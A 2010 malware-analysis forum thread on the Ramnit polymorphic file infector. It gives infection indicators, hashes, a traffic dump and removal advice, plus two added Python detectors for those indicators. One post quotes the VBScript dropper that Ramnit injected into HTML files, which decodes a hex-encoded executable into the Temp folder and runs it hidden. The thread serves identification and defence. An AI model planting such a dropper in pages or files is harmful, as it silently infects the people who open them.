A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #1914  by Sneakyone
 Fri Aug 13, 2010 12:13 am
Hi everybody.

It seems this new infection is a new polymorphic file infector, and it infects a lot of files, and once they are cleaned it infects them + more again, similar to Virut/Sality.

I will ask these two users who are badly infected with it to format in a minute, just want to bring this to the attention of everyone.

(Note: Look at the ESET logs, it is the one that picked up the infected files.)

1. http://www.geekpolice.net/virus-spyware ... t23218.htm

2. http://www.pchelpforum.com/progress-hij ... post532721

The file Desktoplayer.exe is the main part of the infection; it will keep re-appearing and infecting more files.

Also, it will create dummy files that look like this:

FirefoxSrv.exe
UserinitSrv.exe
ExplorerSrv.exe

My suggestion is running an ESET scan as soon as you see desktoplayer.exe, and if it finds a ton of infected files, tell them to format without backing anything up.

It is unfortunate, but that is the only way so far.
 #1915  by Quads
 Fri Aug 13, 2010 12:47 am
http://www.threatexpert.com/report.aspx ... 975182c819

This could be added inside .htm and .html files on hard drives

<script Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A...00"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

They are having fun here http://www.bleepingcomputer.com/forums/topic336044.html

Looks like they are getting somewhere with this one http://www.bleepingcomputer.com/forums/topic335436.html

Quads
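
Added example, not part of the original posts: a Python check that flags .htm/.html content carrying a VBScript block with the indicators visible in the script quoted above. The sample documents, the function names and the three-indicator threshold are constructed assumptions.

```python
import re

# VBScript <script> blocks; the quoted script uses an unquoted Language attribute.
SCRIPT_RE = re.compile(
    r"<script\b[^>]*language\s*=\s*[\"']?vbscript[\"']?[^>]*>(.*?)</script>",
    re.I | re.S,
)

# Indicators taken from the script quoted in the post above.
INDICATORS = {
    # String literal starting with the hex of "MZ" (PE header magic).
    "hex_mz_string": re.compile(r'=\s*"4D5A[0-9A-F.]*"', re.I),
    "filesystemobject": re.compile(r'CreateObject\(\s*"Scripting\.FileSystemObject"\s*\)', re.I),
    # GetSpecialFolder(2) resolves to the Temp folder.
    "temp_folder": re.compile(r"GetSpecialFolder\(\s*2\s*\)", re.I),
    "wscript_shell": re.compile(r'CreateObject\(\s*"WScript\.Shell"\s*\)', re.I),
}


def scan_html(html):
    """Return the sorted indicator names found inside VBScript blocks."""
    hits = set()
    for body in SCRIPT_RE.findall(html):
        for name, rx in INDICATORS.items():
            if rx.search(body):
                hits.add(name)
    return sorted(hits)


def is_suspicious(html, threshold=3):
    """Assumed rule: three or more indicators in one document is worth a look."""
    return len(scan_html(html)) >= threshold


# Constructed samples: the hex string is truncated and is not a valid executable.
INFECTED = '''<html><body>hello</body></html>
<script Language=VBScript><!--
WriteData = "4D5A9000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\\" & DropFileName
Set WSHshell = CreateObject("WScript.Shell")
//--></SCRIPT>'''
CLEAN = '<html><script language="vbscript">MsgBox "hi"</script></html>'

if __name__ == "__main__":
    print(scan_html(INFECTED), is_suspicious(INFECTED))
    print(scan_html(CLEAN), is_suspicious(CLEAN))
```
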
 #1917  by Sneakyone
 Fri Aug 13, 2010 3:31 am
Hi.

Thanks for the reply.

I will try to continue working on it now, but it will probably get lengthy, if you have any more suggestions they will be greatly appreciated. ;)
 #1923  by PX5
 Fri Aug 13, 2010 9:03 am
lol@bleeping link, dude's machine is toasted.

Ramnit = FUFI! :lol:
 #1925  by Quads
 Fri Aug 13, 2010 9:47 am
Hmmmm just depends, I had 2 PCs turn up needing Malware removed, early on when Virut appeared and the systems were infected with Virut + rootkits, I managed to remove Virut and the other Malware, without needing to reinstall Windows or reformat as the user did not have the Dell OS discs or backups.

It was fun, took some time and only had to reinstall a couple of 3rd-party programs and Windows files replaced.

Quads
 #1931  by SecConnex
 Fri Aug 13, 2010 3:33 pm
I did a short analysis of it last night, because after a while it got a little scary. :P But anyway, in testing it, I came up with a few conclusions I believe I should share about this infection.

Win32\Ramnit is a fairly new infection, with three currently active variants. Normally, they pair with each other when infecting the machine.

The first variant is a backdoor trojan that looks like ZBOT. The second variant is a rootkit that looks like TDL3 and behaves like Trojan.Agent, and a worm that spreads via removable media. The third variant, and the final, is a polymorphic file infection that behaves like Sality and looks like Virut.

(Keep in mind, I state heuristic terms here: "looks like", "behaves like".)

Behavior

-Modifies the Userinit key in Winlogon:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="c:\windows\system32\userinit.exe,,c:\program files\microsoft\desktoplayer.exe"


-Reads running processes, then creates dummy files named after the running processes and infects most files loaded in running processes, and sends the legit files to a bak folder locked from Windows API. For example: userinitsrv.exe

-Creates its main file: c:\program files\microsoft\desktoplayer.exe, which is known as itself, Trojan.Ramnit, the trojan downloader or malware dropper.

-The main trojan component is known to be Trj.Agent, while the dummy files are infected with Trj.IRCNite, an IRC trojan, and ZBOT.

-It uses rootkit techniques to conceal its presence on the system. It *may* infect two random system files, which is related to TDL3.


Removal

-Most online scanners will detect it. Also, MBAM will detect some of it, especially subtle changes in the OS. ComboFix will delete odd looking files.


Overall, the damage to the system is so great that we are recommending a primary disinfection, then reformat and reinstall.

Here is how it should be disinfected:

A. TDSSKiller
B. ComboFix
C. Reformat and reinstall.

You cannot allow the infected drivers to stay put. They need to be disinfected, or the infection can carry over, even with a reformat and reinstall.
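
Added example, not part of the original posts: a Python triage check for two of the behaviours listed above, the extra Userinit entry and the <process>Srv.exe dummy files, run over exported data rather than a live registry. The expected userinit.exe path, the function names and the file and process lists are constructed assumptions; the Userinit value is the one quoted in the post.

```python
import ntpath

# Assumption: default install path; adjust for a non-standard %SystemRoot%.
EXPECTED_USERINIT = r"c:\windows\system32\userinit.exe"


def extra_userinit_entries(value, expected=EXPECTED_USERINIT):
    """Return every comma-separated Userinit entry that is not the stock binary."""
    entries = [e.strip().strip('"') for e in value.split(",")]
    want = ntpath.normcase(expected)
    return [e for e in entries if e and ntpath.normcase(e) != want]


def dummy_srv_files(file_names, process_names):
    """Return files named <process>Srv.exe for a process in process_names."""
    stems = {ntpath.splitext(ntpath.basename(p))[0].lower() for p in process_names}
    hits = []
    for name in file_names:
        stem, ext = ntpath.splitext(ntpath.basename(name))
        low = stem.lower()
        if ext.lower() == ".exe" and low.endswith("srv") and low[:-3] in stems:
            hits.append(name)
    return hits


# Userinit value as quoted in the post above.
USERINIT_VALUE = (
    r"c:\windows\system32\userinit.exe,,c:\program files\microsoft\desktoplayer.exe"
)
# Constructed directory listing and process list for the demonstration.
FILES = ["FirefoxSrv.exe", "firefox.exe", "notepad.exe", "UserinitSrv.exe", "TimeSrv.exe"]
PROCESSES = ["firefox.exe", "userinit.exe", "explorer.exe"]

if __name__ == "__main__":
    print("Unexpected Userinit entries:", extra_userinit_entries(USERINIT_VALUE))
    print("Possible dummy files:", dummy_srv_files(FILES, PROCESSES))
```
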
 #1932  by EP_X0FF
 Fri Aug 13, 2010 3:35 pm
Providing a dropper sample would be very good.
 #1933  by SecConnex
 Fri Aug 13, 2010 3:41 pm
I'm so sorry. I lost access to the internet after most files got infected. I attempted to grab some samples, but the infection was too great.

I suppose I could have attempted to reverse a couple of the files, and grab some of their malcode.

I got the MD5 of DesktopLayer.exe, which is its main file: 1E28B93DF4DC13BA183D7CAC665BC45E

MD5 of a couple infected files: 074A688443FAEA25C2589975069DE044

I did get a little bit of traffic code, though:

Port 443
00000010 | 0000 7A65 7573 5553 0008 0000 0075 736F | ..zeusUS.....uso
00000020 | 772E 6578 6500 FF4C 0000 00E2 0021 0000 | w.exe..L.....!..
00000080 | 0000 0064 6F67 6D61 000E 0000 0031 3238 | ...dogma.....128
00000090 | 3033 3536 3236 392E 6578 65E8 00FF 4C00 | 0356269.exe...L.
00000120 | 0100 0000 280A 0000 0200 0000 5365 7276 | ....(.......Serv
00000130 | 6963 6520 5061 636B 2032 0000 0000 0000 | ice Pack 2......


VirusTotal: http://www.virustotal.com/file-scan/rep ... 1281653802
http://www.virustotal.com/file-scan/rep ... 1281446347
 #1937  by fatdcuk
 Fri Aug 13, 2010 5:27 pm
Hi EP,

Here's a Z-bot patched by Ramnit.A

LOL Jay ...same as Virut/Sality/Parite..they like appending their code to files (and that includes other malwares, shock, horror)...

PX5 can vouch for what a mess this made in a VM for him earlier this week...I had to reload selector too :lol:
Attachments
(242.59 KiB) Downloaded 301 times
 #1952  by SecConnex
 Fri Aug 13, 2010 8:51 pm
Rofl. I think I need a better VM. I've only had VBox for quite a while.

I need my test machine back, because I hate working in VMs with new infections. They seem to just kill the VM.